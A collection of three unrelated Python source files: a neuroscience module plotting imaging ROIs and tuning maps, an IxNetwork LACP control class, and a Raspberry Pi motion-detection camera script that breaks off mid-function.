plt.tight_layout()
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
export_name = f'pathevent ov {key["base_session"]} cell {key["cell_id"]}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
return
def rois(self, **kwargs):
'''
Plot ROIs
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
invert_img_cmap: bool
For image to plot, invert grey scale colormap?
hash_or_animal : string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title.
Defaults to 'animal'
color_mapping : string
Name of the attribute (=column name) to generate colors over
Defaults to None.
draw_image : bool
Draw the max image? Defaults to False.
image_key : string
Key of image to plot. Defaults to 'max_img'.
percentile : float
Percentile where to cap the colormap for image display
(e.g. 99. will compress the image into 0 to 99th percentile of its values)
This is useful for bringing out dim details that would otherwise be over-
shadowed by other, brighther details; it washes out details though
draw_centers : bool
Draw the center points? Defaults to True.
draw_numbers : bool
Draw label on top of the cells (cell index)?
Defaults to False.
draw_pixels : bool
Draw all pixels of extracted cells.
Defaults to False.
draw_outlines : bool
Draw ROI outlines?
Defaults to False.
text_color : string
Color of label text. Defaults to 'k' (black).
fontsize : float
Font size for annotations (default: 15.)
dot_color : string
Color of cell center dots. Defaults 'k'.
dot_size : int
Size of all drawn dots (global for all scatter plots).
Defaults to 5.
alpha : float
Transparency (0-1) of dots (global for all scatter plots).
Defaults to .8.
colors : color array with color for every cell.
Use this to color code cells according to certain properties.
Defaults to random color palette based on husl only if 'color_mapping'
attribute is not set.
scalebar : float
Display scalebar of defined length [microns]
return_axes : bool
Return axes if True
return_figure : bool
Return figure object if True (and plot).
This is overridden if return_axes = True
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
path_suffix : string
Appendix for filename, like _animalxy, default: empty string
despine : bool
Whether to show axes or not (seaborn despine), default: True
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap).colors
invert_img_cmap= kwargs.get('invert_img_cmap', False)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
color_mapping = kwargs.get('color_mapping', None)
draw_image = kwargs.get('draw_image', False)
image_key = kwargs.get('image_key', 'max_image')
percentile = kwargs.get('percentile', None)
draw_centers = kwargs.get('draw_centers', True)
draw_numbers = kwargs.get('draw_numbers', False)
draw_pixels = kwargs.get('draw_pixels', False)
draw_outlines = kwargs.get('draw_outlines', False)
text_color = kwargs.get('text_color', ROI_TEXT_COLOR)
fontsize = kwargs.get('fontsize', 15.)
dot_color = kwargs.get('dot_color', ROI_DOT_COLOR)
dot_size = kwargs.get('dot_size', 5)
alpha = kwargs.get('alpha', .8)
colors = kwargs.get('colors', None)
scalebar = kwargs.get('scalebar', None)
return_axes = kwargs.get('return_axes',False)
return_figure = kwargs.get('return_figure',False)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
path_suffix = kwargs.get('path_suffix', '')
despine = kwargs.get('despine', True)
# Sanity checks
if scalebar is not None:
assert scalebar > 1.,'Given scalebar length ({}) is too small'
def __iscorr():
# Find out if we are dealing with "corr" corrected
# table output or non-corrected (raw) output
# Listens for the keyword _corr in SQL query after "FROM".
# (Assumes 'SomethingCorr' as table name)
sql = self.dj_object.make_sql()
return '_corr' in sql.split('FROM')[1]
def __dataset_name():
# Sometimes the attribute 'dataset_name' gets renamed to 'signal_dataset'
if 'signal_dataset' in self.__attributes:
return 'signal_dataset'
else:
return 'dataset_name'
# Prepare list of attributes to check
# Find out if we are handling unwarped (corr) or raw data
if __iscorr():
ATTR_ROIS = self.ATTR_ROIS_CORR.copy()
image_key = [image_key + '_corr' if '_corr' not in image_key else image_key][0]
CENTER_X = 'center_x_corr'
CENTER_Y = 'center_y_corr'
PIXELS_X = 'xpix_corr'
PIXELS_Y = 'ypix_corr'
XLIM = 'x_range_microns_eff'
YLIM = 'y_range_microns_eff'
LAMBDA = 'lambda_corr'
else:
ATTR_ROIS = self.ATTR_ROIS.copy()
image_key = [image_key.split('_corr')[0] if '_corr' in image_key else image_key][0]
CENTER_X = 'center_x'
CENTER_Y = 'center_y'
PIXELS_X = 'xpix'
PIXELS_Y = 'ypix'
XLIM = 'x_range'
YLIM = 'y_range'
LAMBDA = 'lambda'
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_ROIS.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_ROIS.append(self.ANIMAL_NAME)
ATTR_ROIS.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
if color_mapping is not None:
ATTR_ROIS.append(color_mapping)
ATTR_ROIS.append(image_key)
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_ROIS):
raise KeyError('One or more of these were not found: {}'.format(ATTR_ROIS))
###########################################################################
############### START PLOTTING FUNCTIONS
if self.keys is not None:
iterator = self.keys
else:
iterator = self.dj_object
# Check if there is more than one imaging analysis dataset available
# If this is true, then multiple sessions are returned and this function
# cannot be used
if len(set(iterator.fetch(__dataset_name()))) != 1:
raise KeyError('More than one dataset found (indicating multiple results)')
# Take care of color palette
if colors is None:
# No color array given
# Generate either over "color_mapping" attribute
# (take whole session as basis, no matter what)
# or random (over 'cell_ids')
if color_mapping is not None:
colors = make_linear_colormap(iterator.fetch(color_mapping),
reference_numbers=self.dj_object.fetch(color_mapping),
cmap=cmap)
else:
# "random"
colors = make_linear_colormap(iterator.fetch('cell_id'), cmap=cmap)
else:
# Check integrity
if len(colors) != len(iterator):
raise IndexError('Color length does not match length of datajoint results')
# Make loop with tqdm progress bar
# In this case it is just a very small "package" since most of the data will be pre-fetched
tqdm_iterator = self.__tqdm_iterator(iterator.proj(), len(iterator), 'Drawing ROIs')
# Before looping, pre-fetch large results: CENTER_X, CENTER_Y, PIXELS_X, PIXELS_Y etc
pixel_data = pd.DataFrame(self.dj_object.fetch('KEY', *ATTR_ROIS, as_dict=True))
pixel_data.set_index('cell_id', inplace=True)
if ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Check for custom styling
# These overwrite the keyword arguments for this function
if self.style in styles:
text_color = styles[self.style].get('roi_text_color', text_color)
dot_color = styles[self.style].get('roi_dot_color', dot_color)
# Figure
if not external_axis:
figure = self.__create_figure_single
ax = figure.add_subplot(111)
# Loop over cells and draw
for no, key in tqdm_iterator:
entry = pixel_data.loc[key['cell_id']]
if no == 0:
# Get figure title
title = self.__title(entry, color_mapping, hash_or_animal, show_cell=False)
if display_title:
ax.set_title(title)
# Plot image
image_ = ax.imshow(entry[image_key],
cmap=['gist_gray' if not invert_img_cmap else 'gist_gray_r'][0],
vmin=np.nanmin(entry[image_key]),
vmax=[np.nanmax(entry[image_key]) if percentile is None else np.nanpercentile(entry[image_key], percentile)][0],
)
if not draw_image: image_.remove() # Need to draw it anyway first!
if draw_pixels:
npixels = len(entry[PIXELS_X])
rgba_colors = np.broadcast_to(colors[no],(npixels,3))
rgba_colors = np.hstack((rgba_colors, np.zeros((npixels,1))))
lambdas = entry[LAMBDA].copy()
lambdas = np.nan_to_num(lambdas)
if np.min(lambdas) < 0:
lambdas += np.abs(np.min(lambdas))
# Normalize alpha values
norm_alpha_px = lambdas / lambdas.max()
rgba_colors[:, 3] = norm_alpha_px
#print(rgba_colors)
ax.scatter(entry[PIXELS_X], entry[PIXELS_Y], s=dot_size, lw=0, color=rgba_colors, marker='o')
if draw_centers:
ax.scatter(entry[CENTER_X],entry[CENTER_Y], s=dot_size, lw=1.5, c=[colors[no] if not draw_pixels else dot_color], alpha=alpha)
if draw_numbers:
# .name holds the index and it was set to 'cell_id' above
ax.text(entry[CENTER_X], entry[CENTER_Y],f'{entry.name}', color=text_color, \
ha='center', va='center',\
fontsize=fontsize)
if draw_outlines:
zero_image = np.zeros_like(entry[image_key])
zero_image[entry[PIXELS_Y], entry[PIXELS_X]] = 1
zero_image = gaussian(zero_image, sigma=.15, mode='nearest', preserve_range=True, truncate=4.0)
distance = distance_transform_edt(zero_image)
distance[distance != 1] = 0
outline = np.where(distance == 1)
ax.scatter(outline[1],outline[0], s=dot_size/10, c=[colors[no] if not draw_pixels else dot_color], alpha=alpha, marker='o')
# Take care of axes styling
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
ax.set_xlim(entry[XLIM])
ax.set_ylim(entry[YLIM][::-1])
# Display scale bar?
if scalebar is not None:
# Draw scalebar in bottom right corner with some margin
if not draw_image:
color_scalebar = 'k'
else:
color_scalebar = 'w'
ax.plot([np.max(entry[XLIM])-scalebar-5,
np.max(entry[XLIM])-scalebar-5+scalebar],
[np.max(entry[YLIM])-5,
np.max(entry[YLIM])-5],
lw=4, color=color_scalebar,
alpha=.95, solid_capstyle='butt')
sns.despine(left=despine, right=despine, bottom=despine, top=despine)
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
figure.savefig(self.save_path / f'rois {title.split("|")[0]}{path_suffix}.{self.save_format}', dpi=300, bbox_inches='tight')
if return_axes:
return ax
if return_figure:
return figure
########################################################################################################################################################################################################################
########################################################################################################################################################################################################################
### HELPERS
def _get_ovc_tuningmaps(recording_dict, key):
'''
Helper for tuningmaps_ov
- Fetch tuningmaps
- Object position in tuningmap coordinates
'''
fill_value = 0 # or np.nan
for key_ in ['dataset_name', 'recording_order','signal_dataset','tracking_dataset']:
try:
_ = key.pop(key_)
except KeyError:
pass
rm, mask = (Ratemap & recording_dict['base'] & key).fetch1('tuningmap','mask_tm')
tuningmap = np.ma.array(rm, mask=mask).filled(fill_value=fill_value)
recording_dict['base']['tuningmap'] = tuningmap
for session in ['object1', 'object2']:
# Get fields and object position (in tuningmap coordinates)
rm, mask = (Ratemap & recording_dict[session] & key).fetch1('tuningmap','mask_tm')
tuningmap = np.ma.array(rm, mask=mask).filled(fill_value=fill_value)
# Take care of objects / positions
try:
obj_x, obj_y = (ArenaObjectPos & recording_dict[session] & key).fetch1('obj_x_coord_calib','obj_y_coord_calib')
except dj.DataJointError:
obj = (ArenaObjectPos & recording_dict[session] & key).fetch('obj_x_coord_calib','obj_y_coord_calib', as_dict=True)
if session == 'object1':
obj_x, obj_y = obj[0]['obj_x_coord_calib'], obj[0]['obj_y_coord_calib']
else:
obj_x, obj_y = obj[1]['obj_x_coord_calib'], obj[1]['obj_y_coord_calib']
x_edges, y_edges = (Occupancy & recording_dict[session] & key).fetch1('x_edges','y_edges')
# ... Where is the object in tuningmap "coordinates" (bins)
bin_size_rm_x = np.mean(np.diff(x_edges))
bin_size_rm_y = np.mean(np.diff(y_edges))
obj_x_rm = ((obj_x - x_edges[0]) / bin_size_rm_x) - .5
obj_y_rm = ((obj_y - y_edges[0]) / bin_size_rm_y) - .5
recording_dict[session]['tuningmap'] = tuningmap
recording_dict[session]['object_x'] = obj_x
recording_dict[session]['object_y'] = obj_y
recording_dict[session]['object_x_rm'] = obj_x_rm
recording_dict[session]['object_y_rm'] = obj_y_rm
max_rm = []
for session in ['base','object1','object2']:
max_rm_ = np.nanpercentile(recording_dict[session]['tuningmap'],99)
max_rm.append(max_rm_)
return recording_dict, np.nanmax(max_rm)
def _get_ovc_tracking_signal(recording_dict, key):
'''
Helper for path_event_ov
- Fetch tracking and signal
- Object positions
'''
for key_ in ['dataset_name', 'recording_order','signal_dataset','tracking_dataset']:
try:
_ = key.pop(key_)
except KeyError:
pass
tracking = (Tracking.OpenField & recording_dict['base'] & key).fetch1()
signal = (SignalTracking & recording_dict['base'] & key).fetch1()
recording_dict['base']['tracking'] = tracking
recording_dict['base']['signal'] = signal
for session in ['object1', 'object2']:
# Get fields and object position (in tuningmap coordinates)
tracking = (Tracking.OpenField & recording_dict[session] & key).fetch1()
signal = (SignalTracking & recording_dict[session] & key).fetch1()
recording_dict[session]['tracking'] = tracking
recording_dict[session]['signal'] = signal
# Take care of objects / positions
try:
obj_x, obj_y = (ArenaObjectPos & recording_dict[session] & key).fetch1('obj_x_coord_calib','obj_y_coord_calib')
except dj.DataJointError:
obj = (ArenaObjectPos & recording_dict[session] & key).fetch('obj_x_coord_calib','obj_y_coord_calib', as_dict=True)
if session == 'object1':
obj_x, obj_y = obj[0]['obj_x_coord_calib'], obj[0]['obj_y_coord_calib']
else:
obj_x, obj_y = obj[1]['obj_x_coord_calib'], obj[1]['obj_y_coord_calib']
recording_dict[session]['object_x'] = obj_x
recording_dict[session]['object_y'] = obj_y
return recording_dict
def draw_vector_map(masked_histogram, radial_bins_hist, angular_bins_hist):
'''
Draw single vector map (Object vector cell related)
masked_histogram : np masked array
radial_bins_hist : list (list(physt.special_histograms.polar_histogram.binnigs))
angular_bins_hist : list (list(physt.special_histograms.polar_histogram.binnigs))
'''
sns.set(style='white', font_scale=1.5)
figure = plt.figure(figsize=(6,6))
ax = figure.add_subplot(111)
ax.imshow(masked_histogram.T,aspect='auto')
ax.set_xlim(0, len(radial_bins_hist))
ax.set_ylim(0, len(angular_bins_hist))
no_xticks = len(ax.get_xticklabels())
no_yticks = len(ax.get_yticklabels())-1
ax.set_xticklabels(np.linspace(0, radial_bins_hist[-1], no_xticks));
yticklabels = np.round(np.degrees(np.linspace(0, angular_bins_hist[-1], no_yticks)))
ax.set_yticklabels(yticklabels);
#ax.set_xlim(0,30)
sns.despine(left=True,bottom=True)
ax.set_xlabel('Distance [mm]')
ax.set_ylabel('Angle [degrees]')
plt.show() |
<reponame>ralfjon/IxNetwork
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Lacp(Base):
"""The Lacp class encapsulates a required lacp node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Lacp property from a parent instance.
The internal properties list will contain one and only one set of properties which is populated when the property is accessed.
"""
_SDM_NAME = 'lacp'
def __init__(self, parent):
super(Lacp, self).__init__(parent)
@property
def LearnedInfo(self):
"""An instance of the LearnedInfo class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.learnedinfo.learnedinfo.LearnedInfo)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.learnedinfo.learnedinfo import LearnedInfo
return LearnedInfo(self)
@property
def Link(self):
"""An instance of the Link class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.link.link.Link)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.link.link import Link
return Link(self)
@property
def EnablePreservePartnerInfo(self):
"""If true, the fields of previous link are updatedw
Returns:
bool
"""
return self._get_attribute('enablePreservePartnerInfo')
@EnablePreservePartnerInfo.setter
def EnablePreservePartnerInfo(self, value):
self._set_attribute('enablePreservePartnerInfo', value)
@property
def Enabled(self):
"""If true, the Link Aggregation Control Protocol (LACP) is enabled.
Returns:
bool
"""
return self._get_attribute('enabled')
@Enabled.setter
def Enabled(self, value):
self._set_attribute('enabled', value)
@property
def IsLacpPortLearnedInfoRefreshed(self):
"""(read only) If true, the learned port information is up to date.
Returns:
bool
"""
return self._get_attribute('isLacpPortLearnedInfoRefreshed')
@property
def RunningState(self):
"""The current running state of LACP.
Returns:
str(unknown|stopped|stopping|starting|started)
"""
return self._get_attribute('runningState')
def RefreshLacpPortLearnedInfo(self):
"""Executes the refreshLacpPortLearnedInfo operation on the server.
This exec refreshes the LACP port learned information.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('RefreshLacpPortLearnedInfo', payload=locals(), response_object=None)
def SendMarkerRequest(self):
"""Executes the sendMarkerRequest operation on the server.
This sends a marker request. The contents of the marker PDU contain the current view of partner (which can be defaulted if no partner is present). The marker will be sent regardless of which state the link is in.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('SendMarkerRequest', payload=locals(), response_object=None)
def SendUpdate(self):
"""Executes the sendUpdate operation on the server.
This exec sends an update to the actor's partners after a change has been made to the link's parameters.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('SendUpdate', payload=locals(), response_object=None)
def Start(self):
"""Executes the start operation on the server.
This exec starts the LACP protocol.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('Start', payload=locals(), response_object=None)
def StartPdu(self):
"""Executes the startPdu operation on the server.
This exec starts PDUs related to LACP (for example, LACPDU, Marker Request PDU, Marker Response PDU) while the protocol is running on the port.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('StartPdu', payload=locals(), response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
This exec stops the LACP protocol.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('Stop', payload=locals(), response_object=None)
def StopPdu(self):
"""Executes the stopPdu operation on the server.
This exec stops PDUs related to LACP (for example, LACPDU, Marker Request PDU, Marker Response PDU) while the protocol is running on the port.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('StopPdu', payload=locals(), response_object=None)
|
<reponame>alanszlosek/hd-raspi-surveillance<gh_stars>1-10
import cv2
import datetime
import gpiozero
import http.server
import json
import math
import numpy
import os
import pathlib
import picamera
import requests
import signal
import socket
import subprocess
import threading
import time
import urllib
# Hi! Use this code to turn your Raspberry Pi into a surveillance camera.
# It records h264 videos when motion is detected
# It also contains a simple webpage where you can watch the live stream via JPEGs that refresh twice a second
#
# Regarding the output video, you'll need to join the before and after files together files into a mp4 to view them. You can use ffmpeg to do this:
# ffmpeg -framerate 10 -i "concat:20201025060604_before.h264|20201025060604_after.h264" -c:v copy 20201025060604.mp4
# A raspi4 can handle 1088p () 30fps and detect motion 2-3 times per second, while keeping CPU core around 80%!
# Default settings. If config.json is present, we'll merge in those values on start.
settings = {
# raspi4 settings
'fps': 30,
'width': 1920,
'height': 1088,
# raspi zero settings (IIRC)
#'fps': 30,
#'width': 1280,
#'height': 720,
'sensitivityPercentage': 0.2,
# Check for motion at this interval. 0.3 (three times a second) is often frequent enough to pick up cars on a residential road, but it depends on many things. You'll need to fiddle.
'secondsBetweenDetection': 0.3,
# how many seconds of h264 to save prior to when motion is detected. this will be saved in a *_before.h264 file
'secondsToSaveBeforeMotion': 2,
'secondsToSaveAfterMotion': 2,
'heartbeatServer': '192.168.1.173',
'heartbeatPort': 5001,
'ignore': [
# [startX, startY, endX, endY]
[0, 0, 1920, 669],
[0, 808, 1920, 1088]
]
}
class SplitFrames(object):
def __init__(self):
self.buf = None
def write(self, buf):
if not buf.startswith(b'\xff\xd8'):
print('ERROR: buffer with JPEG data does not start with magic bytes')
# NOTE: Until i see "buffer does not start with magic bytes" actually happen, let's just use the buffer picamera gives us instead of copying into a BytesIO stream
self.buf = buf
class MotionDetection:
def __init__(self, camera, settings, streamer):
self.camera = camera
self.settings = settings
self.previousFrame = None
self.motionDetected = False
self.motionAtTimestamp = 0
self.checkAfterTimestamp = 0
self.updateDetectStillAfterTimestamp = 0
self.stopRecordingAfterTimestamp = 0
self.stopRecordingAfterTimestampDelta = settings['secondsToSaveAfterMotion']
# Create ndarrays ahead of time to reduce memory operations and GC
self.decoded = numpy.empty( (self.settings['height'], self.settings['width'], 3), dtype=numpy.uint8)
streamer.httpd.still = self.decoded
self.grayscale = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
self.previous = None
self.diff = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
self.threshold = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
self.ignore = numpy.ones( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
self.scratch = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
self.config(settings)
def config(self, settings):
self.sensitivityPercentage = self.settings['sensitivityPercentage'] / 100
# N% of white pixels signals motion
cutoff = math.floor(self.settings['width'] * self.settings['height'] * self.sensitivityPercentage)
# Pixels with motion will have a value of 255
# Sum the % of pixels having value of 255 to
self.cutoff = cutoff * 255
# Assemble an ndarray of our ignore regions. We'll multiply this by our current frame to zero-out pixels we want to ignore
for region in self.settings['ignore']:
x = region[0]
y = region[1]
while y < region[3]:
self.ignore[y, x:region[2]] = 0
y += 1
def check(self):
global streamer
self.camera.annotate_text = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
try:
# TODO: capture into a buffer not shared with the http streamer ...
# as-is we can have race-conditions
self.camera.capture(self.decoded, format='bgr', use_video_port=True)
t = time.time()
print('Checking for motion')
self._detect(t)
except Exception as e:
print('Exception within capture_continuous, bailing')
print(str(e))
def _detect(self, currentFrameTimestamp):
cv2.cvtColor(self.decoded, cv2.COLOR_BGR2GRAY, self.grayscale)
if self.previous is None:
self.previous = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
numpy.copyto(self.previous, self.grayscale)
return False
cv2.absdiff(self.previous, self.grayscale, dst=self.diff)
numpy.multiply(self.ignore, self.diff, out=self.scratch)
# rely on numpy to ignore certain portions of the frame by multiplying those pixels by 0
cv2.threshold(self.scratch, 25, 255, cv2.THRESH_BINARY, self.threshold)
# Add up all pixels. Pixels with motion will have a value of 255
pixelSum = numpy.sum(self.threshold)
if pixelSum > self.cutoff: # motion detected in frame
# Log that we are seeing motion
self.motionDetected = True
self.motionAtTimestamp = currentFrameTimestamp
# Stop recording after 10 seconds of no motion
self.stopRecordingAfterTimestamp = currentFrameTimestamp + self.stopRecordingAfterTimestampDelta
print('Seeing motion. Will stop recording after %s' % str(self.stopRecordingAfterTimestamp))
# Let's only use the current frame for detection if it contains motion.
# The thought is that we want to detect very slow moving objects ... objects that might not trigger 2% of pixel changes within 1/3 second but that might over a longer time frame.
numpy.copyto(self.previous, self.grayscale)
# End conditional frame comparison logic
if self.motionDetected and self.stopRecordingAfterTimestamp < currentFrameTimestamp:
# Tell writer we haven't seen motion for a while
print("%d seconds without motion" % self.stopRecordingAfterTimestampDelta)
# Commented out the following so we preserve the timestamp of last motion
#self.motionAtTimestamp = 0
# Log that we are no longer seeing motion
self.motionDetected = False
class requestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, *args):
# Suppress the default behavior of logging every incoming HTTP request to stdout
return
def do_POST(self):
global settings
url = urllib.parse.urlparse(self.path)
path = url.path
if path == '/config.json':
contentLength = int(self.headers['Content-Length'])
data = self.rfile.read(contentLength).decode('utf-8')
o = json.loads(data)
print('Updating settings', data)
mergeConfig(o)
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(b"{}")
def do_GET(self):
url = urllib.parse.urlparse(self.path)
path = url.path
if path == '/':
with open('index.html', 'r') as f:
html = f.read()
self.send_response(200)
self.send_header('Content-Type', 'text/html')
#self.send_headers('Content-Length', len(html))
self.end_headers()
self.wfile.write(html.encode())
elif path == '/status.json':
data = {
'motion': motionDetection.motionDetected,
'motionAtTimestamp': motionDetection.motionAtTimestamp
}
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write( json.dumps(data).encode() )
elif path == '/still.jpeg':
if self.wfile.closed or not self.wfile.writable():
return
if self.server.still is None:
return False
# TODO: race condition alert. should not use a buffer that's being actively used by MotionDetection
still = cv2.imencode('.jpg', self.server.still)[1]
# send headers
self.send_response(200)
self.send_header('Content-Type', 'image/jpeg')
self.send_header('Content-Length', len(still))
self.end_headers()
# this doesn't seem to work
try:
self.wfile.write(still)
except BrokenPipeError as e:
print('BrokenPipeError')
except ConnectionResetError as e:
print('ConnectionResetError')
else:
# TODO: return 404
return False
class Streamer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.outputs = []
self.httpd = http.server.HTTPServer(('0.0.0.0', 8080), requestHandler)
self.httpd.still = None
self.start()
def run(self):
self.httpd.serve_forever()
def done(self):
print('Streamer exiting')
self.httpd.shutdown()
class Periodic(threading.Thread):
def __init__(self, settings):
threading.Thread.__init__(self)
self.settings = settings
self.running = True
self.start()
def done(self):
self.running = False
class Heartbeat(Periodic):
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while self.running:
sock.sendto(b"hi", (self.settings['heartbeatServer'], self.settings['heartbeatPort']))
time.sleep(2)
class Temperature(Periodic):
def run(self):
influx_url = 'http://%s:8086/write' % (self.settings['heartbeatServer'],)
while self.running:
cpu = gpiozero.CPUTemperature()
s = 'raspi.temperature_celsius,host=%s value=%f %d' % (socket.gethostname(), math.floor(cpu.temperature), time.time_ns())
r = requests.post(influx_url, params={'db': 'cube'}, data=s)
time.sleep(30)
def mergeConfig(o):
global settings
for key in o:
settings[key] = o[key]
with open('config.json', 'w') as f:
json.dump(settings, f)
f.close()
running = True
def signal_handler(sig, frame):
global running
running = False
print('Exiting ...')
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Merge in settings from config.json
if os.path.isfile('config.json'):
with open('config.json', 'r') as f:
settings = json.load(f)
f.close()
with picamera.PiCamera() as camera:
camera.resolution = (settings['width'], settings['height'])
camera.framerate = settings['fps']
camera.annotate_background = picamera.Color(y=0, u=0, v=0)
heartbeat = Heartbeat(settings)
temperature = Temperature(settings)
streamer = Streamer()
motionDetection = MotionDetection(camera, settings, streamer)
# See stream.copy_to() usage below for why I'm creating a larher buffer
stream = picamera.PiCameraCircularIO(camera, seconds = settings['secondsToSaveBeforeMotion'] * 2)
camera.start_recording(stream, format='h264')
while running:
try:
# Need a better way to do this, based on how long capture() actually/usually takes
# Hardcoded this to 0.1 for now, since capture() is slow and I want detection 3x per second
camera.wait_recording(0.1) #settings['secondsBetweenDetection'])
except picamera.PiCameraError as e:
print('Exception while recording to circular buffer')
print(str(e))
break
except Exception as e:
print('Non PiCamera exception while recording to circular buffer')
print(str(e))
break
# TODO: return boolean from check instead of reaching into motionDetection.motionDetected
motionDetection.check()
if motionDetection.motionDetected:
print('Motion detected!')
# As soon as we detect motion, split and start recording to h264
# We'll save the circular buffer to h264 later, since it contains "before motion detected" frames
filename = datetime.datetime.fromtimestamp(motionDetection.motionAtTimestamp).strftime('%Y%m%d%H%M%S_%%dx%%dx%%d') % (settings['width'], settings['height'], settings['fps'])
subfolder = 'h264/' + filename[0:8]
pathlib.Path(subfolder).mkdir(parents=True, exist_ok=True)
try:
camera.split_recording('%s/%s_after.h264' % (subfolder, filename))
except picamera.PiCameraError as e:
print('Exception while calling split_recording')
print(str(e))
break
except Exception as e:
print('Non PiCamera exception while calling split_recording')
print(str(e))
break
# Wait until motion is no longer detected, then split recording back to the in-memory circular buffer
while motionDetection.motionDetected:
if running == False:
break
try:
camera.wait_recording(1.0)
except picamera.PiCameraError as e:
print('Exception while recording to h264 file')
print(str(e))
# TODO: Unsure how to handle full disk
break
except Exception as e:
print('Non PiCamera exception while calling split_recording')
print(str(e))
break
motionDetection.check()
print('Motion stopped!')
# Write the frames from "before" motion to disk as well
try:
# The reason I'm explicitly specifying seconds here is that according to the documentation,
# even if you create a circular buffer to hold 2 seconds, that's the lower bound. It might hold more
# depending on how much has changed between frames. Sounds like it allocates by bitrate behind the scenes,
# and truncates based on bytes within the buffer. So if some frames have less data it'll be able to pack more into the buffer
stream.copy_to('%s/%s_before.h264' % (subfolder, filename), seconds = settings['secondsToSaveBeforeMotion'])
except Exception as e:
